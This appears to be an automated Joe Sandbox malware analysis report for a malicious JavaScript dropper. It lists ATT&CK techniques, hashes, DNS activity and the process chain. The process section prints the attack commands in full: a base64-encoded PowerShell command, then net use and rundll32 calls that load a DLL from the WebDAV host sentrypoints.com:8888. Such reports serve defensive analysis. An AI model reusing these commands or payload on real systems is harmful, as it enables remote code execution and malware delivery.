      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Rundll32
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials1
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      608017382513614877.js11%ReversingLabsText.Trojan.Generic
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://aka.ms/pscore680%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      s-part-0017.t-0009.t-msedge.net
      13.107.246.45
      truefalse
        unknown
        sentrypoints.com
        unknown
        unknowntrue
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://sentrypoints.com:8888/onet.exe, 00000004.00000003.1364882970.0000028E67280000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1365439141.0000028E67280000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            http://sentrypoints.com:8888/Rnet.exe, 00000004.00000002.1365439141.0000028E67280000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://aka.ms/pscore68powershell.exe, 00000002.00000002.1368167842.00000261BD2FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1368167842.00000261BD33F000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://sentrypoints.com:8888/net.exe, 00000004.00000002.1365358820.0000028E67250000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1364784710.0000028E6729B000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1364882970.0000028E67280000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1365439141.0000028E6729D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1365439141.0000028E67280000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1368167842.00000261BD2E1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                No contacted IP infos
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1545178
                Start date and time:2024-10-30 08:00:06 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 2m 30s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • GSI enabled (Javascript)
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:608017382513614877.js
                Detection:MAL
                Classification:mal88.rans.spyw.expl.evad.winJS@8/3@1/0
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 1
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .js
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): dllhost.exe
                • Excluded IPs from analysis (whitelisted): 20.12.23.50
                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                • Execution Graph export aborted for target powershell.exe, PID 4220 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: 608017382513614877.js
                TimeTypeDescription
                03:01:00API Interceptor1x Sleep call for process: net.exe modified
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                s-part-0017.t-0009.t-msedge.netPO-004976.xlsGet hashmaliciousUnknownBrowse
                • 13.107.246.45
                Orden de Compra No. 434565344657.xlam.xlsxGet hashmaliciousUnknownBrowse
                • 13.107.246.45
                ORDEN7873097067.xlam.xlsxGet hashmaliciousUnknownBrowse
                • 13.107.246.45
                DHL TRACKING.exeGet hashmaliciousFormBookBrowse
                • 13.107.246.45
                https://trvelocity.petra-dee.org/index.php/campaigns/ao946pbrfq631/track-url/lk782m0eyna84/24e9f9ecc31181de7c43e9793836ee263a7fcd94%20%20office365_event_type%20alertGet hashmaliciousUnknownBrowse
                • 13.107.246.45
                cotizaci#U00f2n.xlam.xlsxGet hashmaliciousUnknownBrowse
                • 13.107.246.45
                AWB-M09CT560.docx.docGet hashmaliciousUnknownBrowse
                • 13.107.246.45
                Fatura, siparis onayi.exeGet hashmaliciousDBatLoader, FormBookBrowse
                • 13.107.246.45
                Sat#U0131nalma Sipari#U015fi_(PO40947)_EMS End#U00fcstriyel Servis.exeGet hashmaliciousLokibotBrowse
                • 13.107.246.45
                O3o5Xzk5Wd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                • 13.107.246.45
                No context
                No context
                No context
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):0.773832331134527
                Encrypted:false
                SSDEEP:3:Nlllulklll/l:NllUk/
                MD5:5A73591A1E1C7267AFC411B693F2863E
                SHA1:603AB1918E225C584AB896076F9A72B3C7394A12
                SHA-256:611F40F5367A0FE36D9FFFC0040AC1A11190C8309134F9DF3AEA5177E04299F9
                SHA-512:152D06A246F0E7874CE564A5C3257D1D203E643D3D6A71DDBA3049076E9D1543BA29A8137B716FE61E1C080490D0AC076F985F2AD2078C55C17B362386418A29
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:@...e................................. .........................
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                File type:ASCII text, with very long lines (65536), with no line terminators
                Entropy (8bit):4.713710659250821
                TrID:
                  File name:608017382513614877.js
                  File size:1'264'705 bytes
                  MD5:d8115aacb5152e72883e055d1ea57a4f
                  SHA1:a22d0ffe6a4e51c8a6896b6ab2d3d5e292c5be2c
                  SHA256:155bd815011e05b05929ebfb0d4ff38a8b9c3e54e4ab5f6fbcc242673cd06068
                  SHA512:51ff565d2399d1f5e02afd577d1c0c4b5bf6b7c908c46a30ed7c04a44b3704fde29be27bfe1ee8eafeaad8db802868da8ebf142c4364989960a2ec0929de210f
                  SSDEEP:24576:JnGWW6Bcwj1uV2QbFzIYiyfvUiyfvPJ3ydwE:5GEj1uV2QbFMYjUj4
                  TLSH:03458FA23F6B0AFF8A635B82CB5D5ED1898758731994A3F324BD754A102CB9093F0717
                  File Content Preview:gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtkedxyegbrqpmpeteltjuailfkiwgigtzrvwtmjlpummxklrqauwlcwbjzosilvnxdeshsqxtlvjdlqdppxfsysadzswuamdrtnehxvzzkonkwpuiiwjsalthgpvfhbfjvonlfacdtmklmohliqgzijhghvfjzkssx
                  Icon Hash:68d69b8bb6aa9a86
                  TimestampSource PortDest PortSource IPDest IP
                  Oct 30, 2024 08:01:00.925916910 CET5222853192.168.2.91.1.1.1
                  Oct 30, 2024 08:01:00.955411911 CET53522281.1.1.1192.168.2.9
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Oct 30, 2024 08:01:00.925916910 CET192.168.2.91.1.1.10x236bStandard query (0)sentrypoints.comA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Oct 30, 2024 08:00:55.262877941 CET1.1.1.1192.168.2.90x3095No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                  Oct 30, 2024 08:00:55.262877941 CET1.1.1.1192.168.2.90x3095No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:03:00:58
                  Start date:30/10/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\608017382513614877.js"
                  Imagebase:0x7ff7261b0000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:2
                  Start time:03:00:58
                  Start date:30/10/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA==
                  Imagebase:0x7ff760310000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:3
                  Start time:03:00:58
                  Start date:30/10/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff70f010000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:4
                  Start time:03:01:00
                  Start date:30/10/2024
                  Path:C:\Windows\System32\net.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\
                  Imagebase:0x7ff70ac60000
                  File size:59'904 bytes
                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:03:01:00
                  Start date:30/10/2024
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\144472456913431.dll,Entry
                  Imagebase:0x7ff684d90000
                  File size:71'680 bytes
                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Call Graph

                  • Executed
                  • Not Executed
                  callgraph clusterC0 clusterC2C0 E1C0 entry:C0 F3C2 Function E1C0->F3C2

                  Script:

                  Code
                  0
                  gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                    1
                    gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                      2
                      gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                        3
                        gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                          4
                          gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                            5
                            gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                              6
                              gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                7
                                gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                  8
                                  gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                    9
                                    gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                      10
                                      gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                        11
                                        gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                          12
                                          gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                            13
                                            gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                              14
                                              gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                15
                                                gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                  16
                                                  gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                    17
                                                    gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                      18
                                                      gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                        19
                                                        gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                          20
                                                          gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                            21
                                                            gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                              22
                                                              gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                23
                                                                gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                  24
                                                                  gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                    25
                                                                    gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                      26
                                                                      gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                        27
                                                                        gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                          28
                                                                          gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                            29
                                                                            gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                              30
                                                                              gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                31
                                                                                gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                  32
                                                                                  gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                    33
                                                                                    gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                      34
                                                                                      gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                        35
                                                                                        gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                          36
                                                                                          gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                            37
                                                                                            gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                              38
                                                                                              gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                39
                                                                                                gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                  40
                                                                                                  gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                    41
                                                                                                    gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                      42
                                                                                                      gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                        43
                                                                                                        gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                          44
                                                                                                          gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                            45
                                                                                                            gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                              46
                                                                                                              gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                                47
                                                                                                                gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                                  48
                                                                                                                  gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                                    49
                                                                                                                    gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                                      50
                                                                                                                      gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                                        51
                                                                                                                        gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                                          52
                                                                                                                          gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                                            53
                                                                                                                            gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                                              54
                                                                                                                              gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                                                55
                                                                                                                                gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                                                  56
                                                                                                                                  gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                                                    57
                                                                                                                                    gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                                                      58
                                                                                                                                      gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                                                        59
                                                                                                                                        gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                                                          60
                                                                                                                                          gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                                                            61
                                                                                                                                            gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                                                              62
                                                                                                                                              gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtked...
                                                                                                                                                63
                                                                                                                                                Function ( '' + gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzsc...
                                                                                                                                                • Function("return this") ➔ function anonymous()
                                                                                                                                                • () ➔
                                                                                                                                                • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                                                                                                                • run("powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtA...",0,false) ➔ 0
                                                                                                                                                Reset < >
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1370492999.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff886e30000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 77ccc4edfbbc3de6cb52025daffe1a002e21f386ffc680683638beff5590914e
                                                                                                                                                  • Instruction ID: f5d3e6d16dfc94a0c9f23397fb1d02d308ccab92e0d94519bae97981a5d63028
                                                                                                                                                  • Opcode Fuzzy Hash: 77ccc4edfbbc3de6cb52025daffe1a002e21f386ffc680683638beff5590914e
                                                                                                                                                  • Instruction Fuzzy Hash: 1701677111CB0D4FD744EF0CE455AA5B7E0FB95364F10056DE58AC3651DA36E882CB46